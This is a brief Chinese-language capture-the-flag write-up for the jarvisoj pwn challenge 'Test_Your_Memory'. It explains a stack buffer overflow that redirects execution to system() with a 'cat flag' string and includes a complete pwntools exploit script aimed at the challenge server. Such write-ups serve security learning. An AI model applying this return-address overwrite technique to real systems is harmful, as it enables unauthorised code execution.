pwn
- Test_Your_Memory
Test_Your_Memory
题目名字和题目没啥关系,真·一点关系也没有。
提供了system()函数
并且在mem_test函数中的输出hint的地址,hint地址内容为cat flag。
所以只需要将返回地址改成system()所在的地址,并将hint的地址传给system就能执行cat flag命令。
from pwn import *
r=remote('pwn2.jarvisoj.com',9876)
e=ELF('./memory')
sys_addr=e.symbols['system']
cat_flag_addr=e.search('cat flag').next()payload='a'*(0x13+4)+p32(sys_addr)+p32(0x8048677)+p32(cat_flag_addr)
r.recvuntil('cff flag go go go ...\n')
r.sendline(payload)
r.interactive()